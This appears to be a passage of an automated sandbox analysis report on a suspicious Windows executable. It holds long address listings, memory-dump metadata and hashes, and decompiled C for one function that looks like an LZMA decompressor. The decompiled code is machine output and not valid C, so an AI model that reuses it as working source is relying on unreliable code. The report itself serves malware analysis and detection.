                                                                                                    0x00406519
                                                                                                    0x00406520
                                                                                                    0x00406523
                                                                                                    0x00406526
                                                                                                    0x0040651b
                                                                                                    0x0040651b
                                                                                                    0x0040651b
                                                                                                    0x00406529
                                                                                                    0x0040652c
                                                                                                    0x0040652f
                                                                                                    0x0040652f
                                                                                                    0x00406532
                                                                                                    0x00406535
                                                                                                    0x00406538
                                                                                                    0x00406538
                                                                                                    0x0040653b
                                                                                                    0x00406542
                                                                                                    0x00406547
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004065d5
                                                                                                    0x004065d5
                                                                                                    0x004065d9
                                                                                                    0x00406977
                                                                                                    0x00000000
                                                                                                    0x00406977
                                                                                                    0x004065df
                                                                                                    0x004065e2
                                                                                                    0x004065e5
                                                                                                    0x004065e9
                                                                                                    0x004065ec
                                                                                                    0x004065f2
                                                                                                    0x004065f4
                                                                                                    0x004065f4
                                                                                                    0x004065f4
                                                                                                    0x004065f7
                                                                                                    0x004065fa
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004061ca
                                                                                                    0x004061ca
                                                                                                    0x004061ce
                                                                                                    0x0040693b
                                                                                                    0x00000000
                                                                                                    0x0040693b
                                                                                                    0x004061d4
                                                                                                    0x004061d7
                                                                                                    0x004061da
                                                                                                    0x004061de
                                                                                                    0x004061e1
                                                                                                    0x004061e7
                                                                                                    0x004061e9
                                                                                                    0x004061e9
                                                                                                    0x004061e9
                                                                                                    0x004061ec
                                                                                                    0x004061ef
                                                                                                    0x004061ef
                                                                                                    0x004061f2
                                                                                                    0x004061f5
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004061fb
                                                                                                    0x00406201
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406207
                                                                                                    0x00406207
                                                                                                    0x0040620b
                                                                                                    0x0040620e
                                                                                                    0x00406211
                                                                                                    0x00406214
                                                                                                    0x00406217
                                                                                                    0x00406218
                                                                                                    0x0040621b
                                                                                                    0x0040621d
                                                                                                    0x00406223
                                                                                                    0x00406226
                                                                                                    0x00406229
                                                                                                    0x0040622c
                                                                                                    0x0040622f
                                                                                                    0x00406232
                                                                                                    0x00406235
                                                                                                    0x00406251
                                                                                                    0x00406254
                                                                                                    0x00406257
                                                                                                    0x0040625a
                                                                                                    0x00406261
                                                                                                    0x00406265
                                                                                                    0x00406267
                                                                                                    0x0040626b
                                                                                                    0x00406237
                                                                                                    0x00406237
                                                                                                    0x0040623b
                                                                                                    0x00406243
                                                                                                    0x00406248
                                                                                                    0x0040624a
                                                                                                    0x0040624c
                                                                                                    0x0040624c
                                                                                                    0x0040626e
                                                                                                    0x00406275
                                                                                                    0x00406278
                                                                                                    0x00000000
                                                                                                    0x0040627e
                                                                                                    0x00000000
                                                                                                    0x0040627e
                                                                                                    0x00000000
                                                                                                    0x00406283
                                                                                                    0x00406283
                                                                                                    0x00406287
                                                                                                    0x00406947
                                                                                                    0x00000000
                                                                                                    0x00406947
                                                                                                    0x0040628d
                                                                                                    0x00406290
                                                                                                    0x00406293
                                                                                                    0x00406297
                                                                                                    0x0040629a
                                                                                                    0x004062a0
                                                                                                    0x004062a2
                                                                                                    0x004062a2
                                                                                                    0x004062a2
                                                                                                    0x004062a5
                                                                                                    0x004062a8
                                                                                                    0x004062a8
                                                                                                    0x004062a8
                                                                                                    0x004062ae
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004062b0
                                                                                                    0x004062b3
                                                                                                    0x004062b6
                                                                                                    0x004062b9
                                                                                                    0x004062bc
                                                                                                    0x004062bf
                                                                                                    0x004062c2
                                                                                                    0x004062c5
                                                                                                    0x004062c8
                                                                                                    0x004062cb
                                                                                                    0x004062ce
                                                                                                    0x004062e6
                                                                                                    0x004062e9
                                                                                                    0x004062ec
                                                                                                    0x004062ef
                                                                                                    0x004062ef
                                                                                                    0x004062f2
                                                                                                    0x004062f6
                                                                                                    0x004062f8
                                                                                                    0x004062d0
                                                                                                    0x004062d0
                                                                                                    0x004062d8
                                                                                                    0x004062dd
                                                                                                    0x004062df
                                                                                                    0x004062e1
                                                                                                    0x004062e1
                                                                                                    0x004062fb
                                                                                                    0x00406302
                                                                                                    0x00406305
                                                                                                    0x00000000
                                                                                                    0x00406307
                                                                                                    0x00000000
                                                                                                    0x00406307
                                                                                                    0x00406305
                                                                                                    0x0040630c
                                                                                                    0x0040630c
                                                                                                    0x0040630c
                                                                                                    0x0040630c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406347
                                                                                                    0x00406347
                                                                                                    0x0040634b
                                                                                                    0x00406953
                                                                                                    0x00000000
                                                                                                    0x00406953
                                                                                                    0x00406351
                                                                                                    0x00406354
                                                                                                    0x00406357
                                                                                                    0x0040635b
                                                                                                    0x0040635e
                                                                                                    0x00406364
                                                                                                    0x00406366
                                                                                                    0x00406366
                                                                                                    0x00406366
                                                                                                    0x00406369
                                                                                                    0x0040636c
                                                                                                    0x0040636c
                                                                                                    0x00406372
                                                                                                    0x00406310
                                                                                                    0x00406310
                                                                                                    0x00406313
                                                                                                    0x00000000
                                                                                                    0x00406313
                                                                                                    0x00406374
                                                                                                    0x00406374
                                                                                                    0x00406377
                                                                                                    0x0040637a
                                                                                                    0x0040637d
                                                                                                    0x00406380
                                                                                                    0x00406383
                                                                                                    0x00406386
                                                                                                    0x00406389
                                                                                                    0x0040638c
                                                                                                    0x0040638f
                                                                                                    0x00406392
                                                                                                    0x004063aa
                                                                                                    0x004063ad
                                                                                                    0x004063b0
                                                                                                    0x004063b3
                                                                                                    0x004063b3
                                                                                                    0x004063b6
                                                                                                    0x004063ba
                                                                                                    0x004063bc
                                                                                                    0x00406394
                                                                                                    0x00406394
                                                                                                    0x0040639c
                                                                                                    0x004063a1
                                                                                                    0x004063a3
                                                                                                    0x004063a5
                                                                                                    0x004063a5
                                                                                                    0x004063bf
                                                                                                    0x004063c6
                                                                                                    0x004063c9
                                                                                                    0x00000000
                                                                                                    0x004063cb
                                                                                                    0x00000000
                                                                                                    0x004063cb
                                                                                                    0x00000000
                                                                                                    0x00406658
                                                                                                    0x00406658
                                                                                                    0x0040665c
                                                                                                    0x00406983
                                                                                                    0x00000000
                                                                                                    0x00406983
                                                                                                    0x00406662
                                                                                                    0x00406665
                                                                                                    0x00406668
                                                                                                    0x0040666c
                                                                                                    0x0040666f
                                                                                                    0x00406675
                                                                                                    0x00406677
                                                                                                    0x00406677
                                                                                                    0x00406677
                                                                                                    0x0040667a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406428
                                                                                                    0x00406428
                                                                                                    0x0040642b
                                                                                                    0x0040679d
                                                                                                    0x0040679d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406824
                                                                                                    0x00406828
                                                                                                    0x00406846
                                                                                                    0x00406846
                                                                                                    0x00406846
                                                                                                    0x0040684d
                                                                                                    0x00406854
                                                                                                    0x00000000
                                                                                                    0x00406854
                                                                                                    0x0040682a
                                                                                                    0x0040682d
                                                                                                    0x00406830
                                                                                                    0x00406833
                                                                                                    0x0040683a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406915
                                                                                                    0x00406918
                                                                                                    0x00406819
                                                                                                    0x00406819
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040654f
                                                                                                    0x00406551
                                                                                                    0x00406558
                                                                                                    0x00406559
                                                                                                    0x0040655b
                                                                                                    0x0040655e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406566
                                                                                                    0x00406569
                                                                                                    0x0040656c
                                                                                                    0x0040656e
                                                                                                    0x00406570
                                                                                                    0x00406570
                                                                                                    0x00406571
                                                                                                    0x00406574
                                                                                                    0x0040657b
                                                                                                    0x0040657e
                                                                                                    0x0040658c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406871
                                                                                                    0x00406871
                                                                                                    0x00406875
                                                                                                    0x004069ad
                                                                                                    0x00000000
                                                                                                    0x004069ad
                                                                                                    0x0040687b
                                                                                                    0x0040687e
                                                                                                    0x00406881
                                                                                                    0x00406885
                                                                                                    0x00406888
                                                                                                    0x0040688e
                                                                                                    0x00406890
                                                                                                    0x00406890
                                                                                                    0x00406890
                                                                                                    0x00406893
                                                                                                    0x00406896
                                                                                                    0x00406896
                                                                                                    0x00406896
                                                                                                    0x00406896
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406594
                                                                                                    0x00406597
                                                                                                    0x004065cd
                                                                                                    0x004066fd
                                                                                                    0x004066fd
                                                                                                    0x004066fd
                                                                                                    0x004066fd
                                                                                                    0x00406700
                                                                                                    0x00406700
                                                                                                    0x00406703
                                                                                                    0x00406705
                                                                                                    0x0040698f
                                                                                                    0x00000000
                                                                                                    0x0040698f
                                                                                                    0x0040670b
                                                                                                    0x0040670e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406714
                                                                                                    0x00406718
                                                                                                    0x0040671b
                                                                                                    0x0040671b
                                                                                                    0x0040671b
                                                                                                    0x00000000
                                                                                                    0x0040671b
                                                                                                    0x00406599
                                                                                                    0x0040659b
                                                                                                    0x0040659d
                                                                                                    0x0040659f
                                                                                                    0x004065a2
                                                                                                    0x004065a3
                                                                                                    0x004065a5
                                                                                                    0x004065a7
                                                                                                    0x004065aa
                                                                                                    0x004065ad
                                                                                                    0x004065c3
                                                                                                    0x004065c8
                                                                                                    0x00406600
                                                                                                    0x00406600
                                                                                                    0x00406604
                                                                                                    0x00406630
                                                                                                    0x00406632
                                                                                                    0x00406639
                                                                                                    0x0040663c
                                                                                                    0x0040663f
                                                                                                    0x0040663f
                                                                                                    0x00406644
                                                                                                    0x00406644
                                                                                                    0x00406646
                                                                                                    0x00406649
                                                                                                    0x00406650
                                                                                                    0x00406653
                                                                                                    0x00406680
                                                                                                    0x00406680
                                                                                                    0x00406683
                                                                                                    0x00406686
                                                                                                    0x004066fa
                                                                                                    0x004066fa
                                                                                                    0x004066fa
                                                                                                    0x00000000
                                                                                                    0x004066fa
                                                                                                    0x00406688
                                                                                                    0x0040668e
                                                                                                    0x00406691
                                                                                                    0x00406694
                                                                                                    0x00406697
                                                                                                    0x0040669a
                                                                                                    0x0040669d
                                                                                                    0x004066a0
                                                                                                    0x004066a3
                                                                                                    0x004066a6
                                                                                                    0x004066a9
                                                                                                    0x004066c2
                                                                                                    0x004066c4
                                                                                                    0x004066c7
                                                                                                    0x004066c8
                                                                                                    0x004066cb
                                                                                                    0x004066cd
                                                                                                    0x004066d0
                                                                                                    0x004066d2
                                                                                                    0x004066d4
                                                                                                    0x004066d7
                                                                                                    0x004066d9
                                                                                                    0x004066dc
                                                                                                    0x004066e0
                                                                                                    0x004066e2
                                                                                                    0x004066e2
                                                                                                    0x004066e3
                                                                                                    0x004066e6
                                                                                                    0x004066e9
                                                                                                    0x004066ab
                                                                                                    0x004066ab
                                                                                                    0x004066b3
                                                                                                    0x004066b8
                                                                                                    0x004066ba
                                                                                                    0x004066bd
                                                                                                    0x004066bd
                                                                                                    0x004066ec
                                                                                                    0x004066f3
                                                                                                    0x0040667d
                                                                                                    0x0040667d
                                                                                                    0x0040667d
                                                                                                    0x0040667d
                                                                                                    0x00000000
                                                                                                    0x004066f5
                                                                                                    0x00000000
                                                                                                    0x004066f5
                                                                                                    0x004066f3
                                                                                                    0x00406606
                                                                                                    0x00406609
                                                                                                    0x0040660b
                                                                                                    0x0040660e
                                                                                                    0x00406611
                                                                                                    0x00406614
                                                                                                    0x00406616
                                                                                                    0x00406619
                                                                                                    0x0040661c
                                                                                                    0x0040661c
                                                                                                    0x0040661f
                                                                                                    0x0040661f
                                                                                                    0x00406622
                                                                                                    0x00406629
                                                                                                    0x004065fd
                                                                                                    0x004065fd
                                                                                                    0x004065fd
                                                                                                    0x004065fd
                                                                                                    0x00000000
                                                                                                    0x0040662b
                                                                                                    0x00000000
                                                                                                    0x0040662b
                                                                                                    0x00406629
                                                                                                    0x004065af
                                                                                                    0x004065b2
                                                                                                    0x004065b4
                                                                                                    0x004065b7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406316
                                                                                                    0x00406316
                                                                                                    0x0040631a
                                                                                                    0x0040695f
                                                                                                    0x00000000
                                                                                                    0x0040695f
                                                                                                    0x00406320
                                                                                                    0x00406323
                                                                                                    0x00406326
                                                                                                    0x00406329
                                                                                                    0x0040632c
                                                                                                    0x0040632f
                                                                                                    0x00406332
                                                                                                    0x00406334
                                                                                                    0x00406337
                                                                                                    0x0040633a
                                                                                                    0x0040633d
                                                                                                    0x0040633f
                                                                                                    0x0040633f
                                                                                                    0x0040633f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004064a1
                                                                                                    0x004064a1
                                                                                                    0x004064a5
                                                                                                    0x0040696b
                                                                                                    0x00000000
                                                                                                    0x0040696b
                                                                                                    0x004064ab
                                                                                                    0x004064ae
                                                                                                    0x004064b1
                                                                                                    0x004064b4
                                                                                                    0x004064b6
                                                                                                    0x004064b6
                                                                                                    0x004064b6
                                                                                                    0x004064b9
                                                                                                    0x004064bc
                                                                                                    0x004064bf
                                                                                                    0x004064c2
                                                                                                    0x004064c5
                                                                                                    0x004064c8
                                                                                                    0x004064c9
                                                                                                    0x004064cb
                                                                                                    0x004064cb
                                                                                                    0x004064cb
                                                                                                    0x004064ce
                                                                                                    0x004064d1
                                                                                                    0x004064d4
                                                                                                    0x004064d7
                                                                                                    0x004064d7
                                                                                                    0x004064d7
                                                                                                    0x004064da
                                                                                                    0x004064dc
                                                                                                    0x004064dc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040671e
                                                                                                    0x0040671e
                                                                                                    0x0040671e
                                                                                                    0x00406722
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406728
                                                                                                    0x0040672b
                                                                                                    0x0040672e
                                                                                                    0x00406731
                                                                                                    0x00406733
                                                                                                    0x00406733
                                                                                                    0x00406733
                                                                                                    0x00406736
                                                                                                    0x00406739
                                                                                                    0x0040673c
                                                                                                    0x0040673f
                                                                                                    0x00406742
                                                                                                    0x00406745
                                                                                                    0x00406746
                                                                                                    0x00406748
                                                                                                    0x00406748
                                                                                                    0x00406748
                                                                                                    0x0040674b
                                                                                                    0x0040674e
                                                                                                    0x00406751
                                                                                                    0x00406754
                                                                                                    0x00406757
                                                                                                    0x0040675b
                                                                                                    0x0040675d
                                                                                                    0x00406760
                                                                                                    0x00000000
                                                                                                    0x00406762
                                                                                                    0x004064df
                                                                                                    0x004064df
                                                                                                    0x00000000
                                                                                                    0x004064df
                                                                                                    0x00406760
                                                                                                    0x00406995
                                                                                                    0x004069b7
                                                                                                    0x004069bd
                                                                                                    0x004069bf
                                                                                                    0x004069c6
                                                                                                    0x004069c8
                                                                                                    0x004069cf
                                                                                                    0x004069d3
                                                                                                    0x00000000
                                                                                                    0x00405fc4
                                                                                                    0x004069cc
                                                                                                    0x004069cc
                                                                                                    0x00000000
                                                                                                    0x004069cc
                                                                                                    0x00406819
                                                                                                    0x0040689f
                                                                                                    0x004068a5
                                                                                                    0x004068a8
                                                                                                    0x004068ab
                                                                                                    0x004068ae
                                                                                                    0x004068b1
                                                                                                    0x004068b4
                                                                                                    0x004068b7
                                                                                                    0x004068ba
                                                                                                    0x004068c0
                                                                                                    0x004068d9
                                                                                                    0x004068dc
                                                                                                    0x004068df
                                                                                                    0x004068e2
                                                                                                    0x004068e6
                                                                                                    0x004068e8
                                                                                                    0x004068e9
                                                                                                    0x004068ec
                                                                                                    0x004068c2
                                                                                                    0x004068c2
                                                                                                    0x004068ca
                                                                                                    0x004068cf
                                                                                                    0x004068d1
                                                                                                    0x004068d4
                                                                                                    0x004068d4
                                                                                                    0x004068f6
                                                                                                    0x00000000
                                                                                                    0x004068f8
                                                                                                    0x00000000
                                                                                                    0x004068f8
                                                                                                    0x004068f6
                                                                                                    0x00000000
                                                                                                    0x0040676b

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d0b545a720d06a2780d8eb9310de1c164ea8e259f40aa19cdef3f662a7789f4d
                                                                                                    • Instruction ID: 868f2ec1f3ea74d7de1394d818727f69d5aca31e92bf34b5737afca42cfaef71
                                                                                                    • Opcode Fuzzy Hash: d0b545a720d06a2780d8eb9310de1c164ea8e259f40aa19cdef3f662a7789f4d
                                                                                                    • Instruction Fuzzy Hash: 6E913171D00229CBEF28CF98C8547ADBBB1FF44305F15812AD856BB281C7789A9ADF44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040647D, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 98%
                                                                                                    			E0040647D() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004069D4))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600);
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40));
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
